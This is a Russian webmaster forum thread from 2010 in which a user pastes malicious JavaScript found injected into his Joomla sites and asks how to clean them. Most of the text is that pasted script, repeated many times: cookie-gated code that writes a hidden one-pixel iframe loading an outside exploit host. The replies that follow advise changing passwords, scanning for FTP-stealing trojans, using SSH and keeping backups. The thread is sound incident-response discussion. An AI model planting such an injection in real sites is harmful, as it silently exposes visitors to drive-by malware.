   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )[/size]

... (тут еще много - не помещается)



Как наказать пидаров и как вылечить сайт?
Спасибо!
(возможно ли, что это ломанули сервак - т.к. все сайты на Джумла заражены сплоитом, а сайты на ВП - чистые?)
# Вс Май 09, 2010 6:05 pmYabuti Зарег.: 28.11.2008 ; Сообщ.: 16263Ответить с цитатой
Сейчас отписал в саппорт хостинга, пусть у себя тоже проверят сервер:
Цитата:
Здравствуйте!
У меня (заметил только сейчас) ломанули все сайты на движке Joomla - а на WordPress - чистые.
Может ли быть так, что ломанули сервер или это увели только мой FTP-акк?
Несколько зараженных сайтов (там сплоит!!!):
kyn.kz
jc-catering.com

Подскажите пожалуйста, я первый раз сталкиваюсь со взломом - хорошо антивирус заорал (avast! home edition), а то бы подхватил заразу.
Спасибо

# Вс Май 09, 2010 6:09 pmYabuti Зарег.: 28.11.2008 ; Сообщ.: 16263Ответить с цитатой
Блин, и админка зараженного сайта тоже хочет заразить - вот такая фигня:



Как такое можно вылечить, подскажите пожалуйста!!! Shout Angel
# Вс Май 09, 2010 6:22 pmadamant Зарег.: 20.03.2008 ; Сообщ.: 11494Ответить с цитатой
смотри где прописан и удаляй. стучи к сапорту в аську пусть почитстит у себя
# Вс Май 09, 2010 7:29 pmzeoman Зарег.: 19.03.2008 ; Сообщ.: 3708Ответить с цитатой
Yabuti, поменять все пароли и написать разработчикам cms и хостингу. Ловить, как мне кажется, бесполезно. Такое обычно на автомате массово делается, т.е. ты просто попал в список. Ничего личного тут нет.
# Вс Май 09, 2010 8:08 pmSeovin Зарег.: 04.02.2010 ; Сообщ.: 202Ответить с цитатой
Я бы сделал так - закачиваешь все файлы на комп. - запускаешь Dreamweaver или что другое, находишь кусок кода, который хочешь удалить и делаешь автоматическую замену по всему сайту. Потом сайт выгружаешь обратно. Займет минут 15.

З.Ы.

У меня тоже недавно Джумлу ломанули, но аккуратнее.
# Вс Май 09, 2010 9:10 pmSunlight Зарег.: 08.02.2008 ; Сообщ.: 770Ответить с цитатой
проверь еще компьютер на вирусы. у меня было подобное, подхватил троян который утащил пароли от ftp. после этого я уяснил для себя следующее
не пользоваться cuteftp, и вообще не хранить пароли в фтп менеджере, а вводить их вручную при каждом конекте. юзать лицензионный антивирус.
регулярно делать бекапы. тогда мне более менее повезло. только кучу времени потратил ну и нервов.
отключай зараженные сайты. можно получить санкции с поисковиков.
# Вс Май 09, 2010 9:23 pmYabuti Зарег.: 28.11.2008 ; Сообщ.: 16263Ответить с цитатой
зараженные сайты снес вообще (залил в спец-подпапку, когда удет время - разберусь).
Перенесу материалы на WordPress, ну ее нафиг, дырявую Джумлу r5

пароли ввожу всегда вручную, но, видимо, какой-то хитрый троян попался
# Вс Май 09, 2010 10:11 pmSeovin Зарег.: 04.02.2010 ; Сообщ.: 202Ответить с цитатой
Чисто из своего опыта:

Не пользуйтесь FTP, пользуйтесь SSH
Делайте недельные бэкапы.
Нет в природе недырявого движка. Ломают все, даже Пентагон.
Если вас взломали - не обижайтесь, ничего личного, просто Вы попали в поток.
# Вс Май 09, 2010 11:40 pmTomas-R Зарег.: 07.01.2008 ; Сообщ.: 5567Ответить с цитатой
Seovin писал(а):
Чисто из своего опыта:

Не пользуйтесь FTP, пользуйтесь SSH
Делайте недельные бэкапы.
Нет в природе недырявого движка. Ломают все, даже Пентагон.
Если вас взломали - не обижайтесь, ничего личного, просто Вы попали в поток.


Подскажи команды для ssh
залить на хост
слить с хоста

спасибо
# Пн Май 10, 2010 8:46 amawa Зарег.: 13.10.2008 ; Сообщ.: 269Ответить с цитатой
http://www.google.com/search?q=ssh+команды
# Пн Май 10, 2010 11:47 ammescalito Зарег.: 05.09.2006 ; Сообщ.: 97Ответить с цитатой
в некоторых ftp клиентах, под винду, есть SFTP over SSH2
# Пн Май 10, 2010 2:48 pmSeovin Зарег.: 04.02.2010 ; Сообщ.: 202Ответить с цитатой
Насчет команд, неплохой мануал - http://docs.google.com/Doc?id=dfsr6r2x_71fqqm9sk8

Для неискушенных пользователей SSH лучше WinSCP (http://winscp.net/eng/docs/lang:ru) - команды вводить не придется (только пароли не храните)
Новая тема Написать ответ    ГЛАВНАЯ ~ АНТИЧИТ
 
Любое использование материалов, размещенных на ArmadaBoard.com, без разрешения владельцев ArmadaBoard.com запрещено.